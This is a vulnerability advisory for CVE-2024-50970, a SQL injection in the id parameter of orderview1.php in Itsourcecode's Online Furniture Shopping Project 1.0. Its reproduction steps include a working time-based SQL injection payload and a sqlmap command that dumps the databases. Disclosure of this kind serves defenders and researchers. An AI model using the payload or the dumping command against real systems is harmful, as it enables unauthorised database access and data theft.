# CVE-2024-50970
## Description
A SQL injection vulnerability in orderview1.php of Itsourcecode Online Furniture Shopping Project 1.0 allows remote attackers to execute arbitrary SQL commands via the id parameter.
## Vulnerability Type
SQL Injection
## Vendor of Product
Itsourcecode
## Affected Product Code Base:
https://itsourcecode.com/free-projects/php-project/online-furniture-shop-in-php-projects-free-source-code-and-database/ - 1.0
## Affected Component:
The Itsourcecode Online Furniture Shopping v1.0 is vulnerable to SQL injection through the id parameter in the orderview1.php page
## Attack Vectors:
1. Set up the application locally, register an account, and log in with the newly registered account.
2. Navigate to the following URL in your browser:
http://localhost/nikos/orderview1.php?action=edit&id=1728835149
3. Inject SQL Payload:
Modify the id parameter in the URL to include a time-based SQL injection payload.
http://localhost/nikos/orderview1.php?action=edit&id=1728835149+AND+(SELECT+2657+FROM+(SELECT(SLEEP(10)))DTmU)
4. Observe the Application Response:
The page should take noticeably longer (10 seconds) to load if the injection is successful, confirming that the id parameter is vulnerable to SQL injection.
5. Now use the SQLMap tool for further exploitation and dumping databases using the below command:
python sqlmap.py -u "http://localhost/nikos/orderview1.php?action=edit&id=1728835149" --cookie="PHPSESSID=your_cookie_here"--risk 3 --level 3 --dbs --technique=T --dump --no-cast
## Reference:
1. https://itsourcecode.com/free-projects/php-project/online-furniture-shop-in-php-projects-free-source-code-and-database/
2. https://owasp.org/www-community/attacks/SQL_Injection
登录后查看神龙缓存的 POC 文件快照
登录查看